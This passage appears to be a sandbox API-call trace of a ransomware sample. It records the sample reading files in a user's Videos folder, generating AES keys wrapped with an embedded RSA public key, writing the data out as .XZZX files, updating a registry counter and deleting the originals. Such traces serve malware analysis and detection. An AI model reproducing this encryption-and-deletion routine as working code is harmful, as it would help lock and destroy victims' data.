lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x178ec [0129.005] WriteFile (in: hFile=0x664, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0129.005] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x178f1 [0129.005] SetErrorMode (uMode=0x1) returned 0x1 [0129.005] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0129.005] OutputDebugStringW (lpOutputString="end") [0129.005] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0129.005] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0129.005] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3d1f2b0) returned 1 [0129.006] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1f2b0, dwCertEncodingType=0x1, pInfo=0x3d0e4b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0e4e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0e4f0*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3cde4d8) returned 1 [0129.006] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0129.006] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0129.007] CryptEncrypt (in: hKey=0x3cde4d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0129.007] CryptEncrypt (in: hKey=0x3cde4d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1f338*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1f338*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0129.007] WriteFile (in: hFile=0x664, lpBuffer=0x3d1f338*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1f338*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0129.007] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0129.007] WriteFile (in: hFile=0x664, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0129.007] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0129.048] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0129.048] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x668) returned 0x0 [0129.049] RegQueryValueExW (in: hKey=0x668, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0xa8, lpcbData=0x434dfdc*=0x4) returned 0x0 [0129.049] RegCloseKey (hKey=0x668) returned 0x0 [0129.049] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x668) returned 0x0 [0129.049] RegSetValueExW (in: hKey=0x668, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0xa9, cbData=0x4 | out: lpData=0x434dfec*=0xa9) returned 0x0 [0129.049] RegCloseKey (hKey=0x668) returned 0x0 [0129.049] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.049] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.050] CloseHandle (hObject=0x664) returned 1 [0129.051] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0129.051] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0129.051] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\J20J9-k9Q1AQR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j20j9-k9q1aqr.swf")) returned 1 [0129.053] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\J20J9-k9Q1AQR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j20j9-k9q1aqr.swf")) returned 0 Thread: id = 433 os_tid = 0x9d8 [0129.007] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0129.007] lstrcpyW (in: lpString1=0x420f460, lpString2="l0jm8.avi" | out: lpString1="l0jm8.avi") returned="l0jm8.avi" [0129.007] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0129.007] SetErrorMode (uMode=0x1) returned 0x1 [0129.007] lstrcpyW (in: lpString1=0x420f860, lpString2="l0jm8.avi" | out: lpString1="l0jm8.avi") returned="l0jm8.avi" [0129.007] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x4696d754, Data2=0xbd89, Data3=0x4f21, Data4=([0]=0x91, [1]=0x3b, [2]=0x56, [3]=0x32, [4]=0xd3, [5]=0xf2, [6]=0xdb, [7]=0xc7))) returned 0x0 [0129.007] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\l0jm8.avi") returned 50 [0129.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0129.007] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\23B23FF43A95B5A94696D7543EB699F1.XZZX") returned 78 [0129.007] StrStrW (lpFirst="l0jm8.avi", lpSrch="XZZX") returned 0x0 [0129.007] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\l0jm8.avi", dwFileAttributes=0x20) returned 1 [0129.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\l0jm8.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\l0jm8.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x668 [0129.008] ReadFile (in: hFile=0x668, lpBuffer=0x4362048, nNumberOfBytesToRead=0xaa31, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x4362048*, lpNumberOfBytesRead=0x420e418*=0xaa31, lpOverlapped=0x0) returned 1 [0129.009] CloseHandle (hObject=0x668) returned 1 [0129.009] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0129.009] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0129.010] SetErrorMode (uMode=0x1) returned 0x1 [0129.010] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0129.010] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1f3c0) returned 1 [0129.012] CryptGenKey (in: hProv=0x3d1f3c0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde298) returned 1 [0129.244] CryptExportKey (in: hKey=0x3cde298, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0129.244] CryptExportKey (in: hKey=0x3cde298, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x420e41c | out: pbData=0x4350000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0129.244] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0129.245] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0129.245] CryptDestroyKey (hKey=0x3cde298) returned 1 [0129.245] CryptReleaseContext (hProv=0x3d1f448, dwFlags=0x0) returned 0 [0129.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\23B23FF43A95B5A94696D7543EB699F1.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\23b23ff43a95b5a94696d7543eb699f1.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x660 [0129.245] WriteFile (in: hFile=0x660, lpBuffer=0x4362048*, nNumberOfBytesToWrite=0xaa31, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x4362048*, lpNumberOfBytesWritten=0x420e438*=0xaa31, lpOverlapped=0x0) returned 1 [0129.246] SetFilePointer (in: hFile=0x660, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xaa31 [0129.246] WriteFile (in: hFile=0x660, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0129.246] SetFilePointer (in: hFile=0x660, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xaa36 [0129.246] WriteFile (in: hFile=0x660, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x12, lpOverlapped=0x0) returned 1 [0129.247] SetFilePointer (in: hFile=0x660, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xaa48 [0129.247] WriteFile (in: hFile=0x660, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0129.247] SetFilePointer (in: hFile=0x660, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xaa4d [0129.247] SetErrorMode (uMode=0x1) returned 0x1 [0129.247] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0129.247] OutputDebugStringW (lpOutputString="end") [0129.247] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0129.247] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0129.247] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3d1f4d0) returned 1 [0129.248] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1f4d0, dwCertEncodingType=0x1, pInfo=0x3d0e658*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0e688*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0e690*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cde298) returned 1 [0129.248] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0129.248] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0129.248] CryptEncrypt (in: hKey=0x3cde298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0129.248] CryptEncrypt (in: hKey=0x3cde298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1f558*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1f558*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0129.249] WriteFile (in: hFile=0x660, lpBuffer=0x3d1f558*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1f558*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0129.249] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0129.249] WriteFile (in: hFile=0x660, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0129.249] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0129.249] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0129.249] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x674) returned 0x0 [0129.249] RegQueryValueExW (in: hKey=0x674, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xa9, lpcbData=0x420dfdc*=0x4) returned 0x0 [0129.249] RegCloseKey (hKey=0x674) returned 0x0 [0129.249] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x674) returned 0x0 [0129.249] RegSetValueExW (in: hKey=0x674, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xaa, cbData=0x4 | out: lpData=0x420dfec*=0xaa) returned 0x0 [0129.249] RegCloseKey (hKey=0x674) returned 0x0 [0129.249] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.250] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.250] CloseHandle (hObject=0x660) returned 1 [0129.251] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0129.252] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0129.252] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\l0jm8.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\l0jm8.avi")) returned 1 [0129.253] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\l0jm8.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\l0jm8.avi")) returned 0 Thread: id = 434 os_tid = 0x9dc [0129.189] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0129.189] lstrcpyW (in: lpString1=0x434f460, lpString2="s2dwcVO_4E6w.flv" | out: lpString1="s2dwcVO_4E6w.flv") returned="s2dwcVO_4E6w.flv" [0129.189] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0129.189] SetErrorMode (uMode=0x1) returned 0x1 [0129.189] lstrcpyW (in: lpString1=0x434f860, lpString2="s2dwcVO_4E6w.flv" | out: lpString1="s2dwcVO_4E6w.flv") returned="s2dwcVO_4E6w.flv" [0129.189] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0xf42b1ae3, Data2=0xb700, Data3=0x4f1a, Data4=([0]=0x90, [1]=0xeb, [2]=0xae, [3]=0x27, [4]=0x72, [5]=0x8b, [6]=0xee, [7]=0x56))) returned 0x0 [0129.189] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\s2dwcVO_4E6w.flv") returned 57 [0129.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0129.190] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\D0384500388B9600F42B1AE33CC07A48.XZZX") returned 78 [0129.190] StrStrW (lpFirst="s2dwcVO_4E6w.flv", lpSrch="XZZX") returned 0x0 [0129.190] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\s2dwcVO_4E6w.flv", dwFileAttributes=0x20) returned 1 [0129.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\s2dwcVO_4E6w.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s2dwcvo_4e6w.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x660 [0129.190] ReadFile (in: hFile=0x660, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0x8f1a, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x434e418*=0x8f1a, lpOverlapped=0x0) returned 1 [0129.192] CloseHandle (hObject=0x660) returned 1 [0129.192] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0129.193] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0129.193] SetErrorMode (uMode=0x1) returned 0x1 [0129.193] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0129.193] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1f448) returned 1 [0129.196] CryptGenKey (in: hProv=0x3d1f448, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde3d8) returned 1 [0129.425] CryptExportKey (in: hKey=0x3cde3d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0129.425] CryptExportKey (in: hKey=0x3cde3d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x434e41c | out: pbData=0x40a0000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0129.425] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0129.426] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0129.426] CryptDestroyKey (hKey=0x3cde3d8) returned 1 [0129.426] CryptReleaseContext (hProv=0x3d1f5e0, dwFlags=0x0) returned 0 [0129.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\D0384500388B9600F42B1AE33CC07A48.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\d0384500388b9600f42b1ae33cc07a48.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x670 [0129.426] WriteFile (in: hFile=0x670, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0x8f1a, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x434e438*=0x8f1a, lpOverlapped=0x0) returned 1 [0129.427] SetFilePointer (in: hFile=0x670, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8f1a [0129.428] WriteFile (in: hFile=0x670, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0129.428] SetFilePointer (in: hFile=0x670, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8f1f [0129.428] WriteFile (in: hFile=0x670, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x20, lpOverlapped=0x0) returned 1 [0129.428] SetFilePointer (in: hFile=0x670, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8f3f [0129.428] WriteFile (in: hFile=0x670, lpBuffer=0x558263d0*, 